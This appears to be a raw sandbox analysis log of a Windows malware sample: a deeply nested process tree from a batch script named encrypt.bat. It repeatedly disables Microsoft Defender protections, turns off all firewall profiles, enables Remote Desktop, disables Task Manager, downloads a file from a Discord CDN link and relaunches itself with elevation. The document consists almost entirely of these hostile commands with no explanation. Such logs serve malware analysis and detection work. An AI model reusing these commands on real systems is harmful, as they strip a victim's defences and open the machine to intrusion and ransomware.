C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵PID:3888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵
- Command and Scripting Interpreter: PowerShell
PID:1708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵PID:4592
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵PID:1920
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵PID:3436
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵PID:4180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:4936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:1380
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵PID:4784
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵PID:4608
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵
- Modifies Windows Firewall
PID:3552
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵PID:4284
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵PID:4172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵PID:4968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵
- Command and Scripting Interpreter: PowerShell
PID:1108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵PID:2540
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵PID:4928
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵PID:4436
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:3640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:4956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:2396
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵PID:1932
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵PID:3524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵PID:4544
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵PID:1556
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵PID:4300
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵PID:700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:1088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
PID:2448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"16⤵
- Command and Scripting Interpreter: PowerShell
PID:1336 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"17⤵PID:2872
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵PID:4580
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵PID:2732
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"18⤵PID:3524
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f18⤵PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:4656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:4016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:3900
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable18⤵PID:2120
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE18⤵PID:1828
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off18⤵
- Modifies Windows Firewall
PID:4984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off18⤵PID:4924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off18⤵PID:2672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off18⤵PID:328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off18⤵PID:2004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"18⤵PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:1836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:2052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"18⤵
- Blocklisted process makes network request
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"18⤵
- Command and Scripting Interpreter: PowerShell
PID:4108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"19⤵PID:3244
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"20⤵PID:1276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f20⤵PID:3716
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"20⤵PID:4512
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f20⤵PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:4564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:4488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:1632
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable20⤵PID:2848
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE20⤵PID:1856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off20⤵PID:2044
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off20⤵PID:4924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off20⤵PID:1460
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off20⤵PID:1968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off20⤵PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"20⤵PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"20⤵
- Blocklisted process makes network request
PID:4040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"20⤵
- Command and Scripting Interpreter: PowerShell
PID:3944 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"21⤵PID:1920
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"22⤵PID:4244
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f22⤵PID:3716
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"22⤵PID:1384
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f22⤵PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:1856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:4784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:3436
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable22⤵PID:3256
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE22⤵
- Modifies Windows Firewall
PID:2164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off22⤵PID:2872
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off22⤵PID:1088
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off22⤵PID:980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off22⤵PID:3344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off22⤵PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"22⤵PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:4300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:4184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:3524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"22⤵
- Blocklisted process makes network request
PID:772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"22⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:3024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"23⤵PID:1084
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"24⤵PID:1108
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f24⤵PID:888
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"24⤵PID:3716
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f24⤵PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:4000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:532
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable24⤵PID:4544
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE24⤵
- Modifies Windows Firewall
PID:3708
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off24⤵PID:2244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off24⤵PID:4132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off24⤵
- Modifies Windows Firewall
PID:2264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off24⤵
- Modifies Windows Firewall
PID:1792
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off24⤵PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"24⤵PID:3152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵
- Command and Scripting Interpreter: PowerShell
PID:2164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:1336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"24⤵
- Blocklisted process makes network request
PID:4488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"24⤵
- Command and Scripting Interpreter: PowerShell
PID:4532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"25⤵PID:4928
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"26⤵PID:208
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f26⤵PID:4812
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"26⤵PID:4456
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f26⤵PID:4016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:3708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:3524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:4512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:4172
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable26⤵PID:2744
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE26⤵PID:2852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off26⤵
- Modifies Windows Firewall
PID:2292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off26⤵
- Modifies Windows Firewall
PID:4924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off26⤵PID:2916
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off26⤵PID:4860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off26⤵
- Modifies Windows Firewall
PID:4236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"26⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵
- Command and Scripting Interpreter: PowerShell
PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:2852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"26⤵
- Blocklisted process makes network request
PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"26⤵
- Command and Scripting Interpreter: PowerShell
PID:2684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"27⤵PID:1680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV128⤵PID:2264
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"28⤵PID:4640
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f28⤵PID:4116
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"28⤵PID:2228
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f28⤵PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:3524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵PID:4612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:532
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable28⤵PID:4784
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE28⤵
- Modifies Windows Firewall
PID:4168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off28⤵PID:1984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off28⤵PID:4432
-
-
